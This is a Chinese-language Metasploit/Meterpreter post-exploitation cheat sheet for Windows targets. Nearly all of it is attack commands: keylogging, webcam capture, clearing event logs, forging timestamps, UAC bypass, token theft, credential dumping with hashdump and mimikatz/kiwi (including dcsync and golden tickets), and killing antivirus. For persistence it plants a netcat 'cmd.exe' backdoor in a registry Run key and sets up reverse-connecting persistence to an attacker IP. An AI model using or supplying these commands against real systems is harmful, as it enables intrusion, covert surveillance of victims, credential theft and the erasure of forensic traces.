Metasploit从入门到入坟

https://www.metasploit.com/download    #官网下载安装即可

该MSF文件系统是一个直观的方式布置：
data：Metasploit使用的可编辑文件documentation：为框架提供文档external：   源代码和第三方库lib：框架代码库的'肉'modules：实际的MSF模块plugins：可以在运行时加载的插件scripts：Meterpreter和其他脚本tools：各种有用的命令行工具

auxiliary #漏洞辅助模块一般是没有攻击载荷的漏洞攻击encoders  #码器模块evasion   #简单的反杀模块exploits  #渗透攻击模块nops      #空指令模块payloads  #漏洞负载模块

sessions -i <ID值>  #进入会话   -k  #杀死会话background        #将当前会话放置后台run            #执行已有的模块，输入run后按两下tab，列出已有的脚本info     #查看已有模块信息getuid     #查看权限 getpid     #获取当前进程的pidsysinfo   #查看目标机系统信息ps       #查看当前活跃进程    kill <PID值> 杀死进程idletime   #查看目标机闲置时间reboot / shutdown   #重启/关机shell     #进入目标机cmd shell

uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标uictl disable mouse    #禁用鼠标uictl disable keyboard  #禁用键盘uictl enable mouse    #开启鼠标uictl enable keyboard  #开启键盘

webcam_list     #查看摄像头webcam_snap     #通过摄像头拍照webcam_stream   #通过摄像头开启视频

execute -H -i -f cmd.exe   #创建新进程cmd.exe，-H不可见，-i交互

getpid    # 获取当前进程的pidps     # 查看当前活跃进程migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中kill <pid值>   #杀死进程

1264  1148  explorer.exe   x64   1    dayu-PCdayu  C:Windowsexplorer.exe1396  488   svchost.exe

clearev #清除windows中的应用程序日志、系统日志、安全日志，需要管理员权限

getwd 或者 pwd     # 查看当前工作目录  lscdcat C://Users//dayu//Desktop//dayu.txt    # 查看文件内容upload /root/Desktop/test-dayu.txt C://Users//dayu//Desktop    # 上传文件到目标机上download C://Users//dayu//Desktop//dayu.txt /root/Desktop/    # 下载文件到本机上edit C://Users//dayu//Desktop//1.txt     #会进入编辑模式，编辑或创建文件，没有的话，会新建文件rm C://Users//dayu//Desktop//1.txt  #删除文件mkdir lltest2      #只能在当前目录下创建文件夹rmdir lltest2     #只能删除当前目录下文件夹getlwd  或者 lpwd   #操作攻击者主机 查看当前目录lcd /tmp         #操作攻击者主机 切换目

timestomp -v C:/phpStudy/manual.chm     #查看时间戳timestomp C://2.txt -f C://1.txt     #将1.txt的时间戳复制给2.txt

search -f *dayu*.exe    #全局搜索dayu.exe这个文件

ipconfig/ifconfig  #查看网卡信息netstat –ano  #查看端口进程arp      #查看ARP信息getproxy   #查看代理信息route   #查看路由

portfwd add -l 6666 -p 3389 -r 127.0.0.1   #将目标机的3389端口转发到本地6666端口rdesktop 127.0.0.1:6666    #kali远程桌面使用6666端口

run autoroute -s 10.10.10.0/24  #添加到目标环境网络run autoroute –p   #查看添加的路由

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24  #扫描整个段存活主机run auxiliary/scanner/portscan/tcp RHOSTS=10.10.10.2 PORTS=3389  #检查IP是否开放3389

msf> use auxiliary/server/socks4a msf > set srvhost 127.0.0.1msf > set srvport 1080msf > run

vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080

/usr/share/metasploit-framework/modules/post/windows/gather/usr/share/metasploit-framework/modules/post/linux/gather
解释：run post/windows/gather/checkvm #是否虚拟机run post/linux/gather/checkvm #是否虚拟机run post/windows/gather/forensics/enum_drives   #查看分区run post/windows/gather/enum_applications     #获取安装软件信息run post/windows/gather/dumplinks         #获取最近的文件操作run post/windows/gather/enum_ie          #获取IE缓存run post/windows/gather/enum_chrome         #获取Chrome缓存run post/windows/gather/enum_patches    #补丁信息run post/windows/gather/enum_domain    #查找域控

1、getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。2、getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。3、Windows服务已启动，导致与命名管道建立连接。4、该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。

use exploit/windows/local/bypassuacuse exploit/windows/local/bypassuac_injectionuse windows/local/bypassuac_vbsuse windows/local/ask

msf > use exploit/windows/local/bypassuacmsf > set SESSION 5      #选择当前会话msf > run

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息msf > use exploit/windows/....      #利用未打补丁的模块即可msf > set SESSION 5msf > exploit

enumdesktops    #查看可用的桌面getdesktop      #获取当前meterpreter 关联的桌面set_desktop     #设置meterpreter关联的桌面  -h查看帮助screenshot    #截屏use espia      #或者使用espia模块截屏  然后输入screengrabrun vnc      #使用vnc远程桌面连接，这方法有点问题，上传了exe但是启动不了

meterpreter > enumdesktops Enumerating all accessible desktops

meterpreter > use espia meterpreter > screengrab

run getgui -e   #开启远程桌面run getgui -u dayu1 -p 123456   #添加用户run getgui -f 9999 –e   #3389端口转发到6661

run post/windows/manage/enable_rdp  #开启远程桌面run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 #添加用户run post/windows/manage/enable_rdp FORWARD=true LPORT=9998  #将3389端口转发到9998

keyscan_start    #开始键盘记录keyscan_dump     #导出记录数据keyscan_stop   #结束键盘记录

use sniffersniffer_interfaces     #查看网卡sniffer_start 2       #选择网卡 开始抓包sniffer_stats 2       #查看状态sniffer_dump 2 /tmp/lltest.pcap  #导出pcap数据包sniffer_stop 2       #停止抓包

meterpreter > reg -hUsage: reg [command] [options]Interact with the target machine's registry.
OPTIONS:
    -d <opt>  The data to store in the registry value.#注册表中值的数据    -h        Help menu.    -k <opt>  The registry key path (E.g. HKLMSoftwareFoo).#注册表键路径    -r <opt>  The remote machine name to connect to (with current process credentials#要连接的远程计算机名称（使用当前进程凭据）    -t <opt>  The registry value type (E.g. REG_SZ).#注册表值类型    -v <opt>  The registry value name (E.g. Stuff).#注册表键名称    -w        Set KEY_WOW64 flag, valid values [32|64].#设置32位注册列表还是64位COMMANDS:
    enumkey  Enumerate the supplied registry key [-k <key>]#枚举可获得的键    createkey  Create the supplied registry key  [-k <key>]#创建提供的注册表项    deletekey  Delete the supplied registry key  [-k <key>]#删除提供的注册表项    queryclass Queries the class of the supplied key [-k <key>]#查询键值数据    setval Set a registry value [-k <key> -v <val> -d <data>]#设置键值    deleteval  Delete the supplied registry value [-k <key> -v <val>]#删除提供的注册表值    queryval Queries the data contents of a value [-k <key> -v <val>]#查询值的数据内容

upload /root/Desktop/nc64.exe C://Users//dayu//Desktop   #上传nc,前面的是你要上传文件的位置reg enumkey -k HKLM\software\microsoft\windows\currentversion\run   #枚举run下的keyreg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C://Users//dayu//Desktop//nc.exe -Ldp 443 -e cmd.exe' #设置键值reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc   #查看键值
nc -v 192.168.0.142 443  #攻击者连接nc后门

use incognito        #进入incognito模式help incognito      #查看帮助list_tokens -u        #查看可用的tokenimpersonate_token 'NT AUTHORITYSYSTEM'    #假冒SYSTEM token,或者用下面的#impersonate_token NT AUTHORITY\SYSTEM   #不加单引号 需使用\execute -f cmd.exe -i –t            # -t 使用假冒的token执行或者直接shellrev2self       #返回原始token

steal_token <pid值>   #从指定进程中窃取token   先psdrop_token  #删除窃取的token

meterpreter> run killav //这个脚本要小心使用，可能导致目标机器蓝屏死机

run hashdump

run windows/gather/smart_hashdump

run windows/gather/credentials/windows_autologin

[!] Loaded x86 Kiwi on an x64 architecture

creds_all：列举所有凭据creds_kerberos：列举所有kerberos凭据creds_msv：列举所有msv凭据creds_ssp：列举所有ssp凭据creds_tspkg：列举所有tspkg凭据creds_wdigest：列举所有wdigest凭据dcsync：通过DCSync检索用户帐户信息dcsync_ntlm：通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create：创建黄金票据kerberos_ticket_list：列举kerberos票据kerberos_ticket_purge：清除kerberos票据kerberos_ticket_use：使用kerberos票据kiwi_cmd：执行mimikatz的命令，后面接mimikatz.exe的命令lsa_dump_sam：dump出lsa的SAMlsa_dump_secrets：dump出lsa的密文password_change：修改密码wifi_list：列出当前用户的wifi配置文件wifi_list_shared：列出共享wifi配置文件/编码

kiwi_cmd sekurlsa::logonpasswords

run persistence –h  #查看帮助run persistence -X -i 5 -p 4444 -r 192.168.175.145#-X指定启动的方式为开机自启动，-i反向连接的时间间隔(5s) –r 指定攻击者的ip

在C:Users***AppDataLocalTemp目录下，上传一个vbs脚本在注册表HKLMSoftwareMicrosoftWindowsCurrentVersionRun加入开机启动项

run metsvc –h   # 查看帮助run metsvc –A   #自动安装后门

set payload windows/metsvc_bind_tcp并把port设置31337端口即可...连接

/usr/share/metasploit-framework/modules/auxiliary/scanner/在这个目录下是扫描脚本，可以修改的

use auxiliary/scanner/http/dir_scanneruse auxiliary/scanner/http/jboss_vulnscanuse auxiliary/scanner/mssql/mssql_loginuse auxiliary/scanner/mysql/mysql_versionuse auxiliary/scanner/oracle/oracle_login常用的扫描脚本，枚举什么自己看文件名即可理解...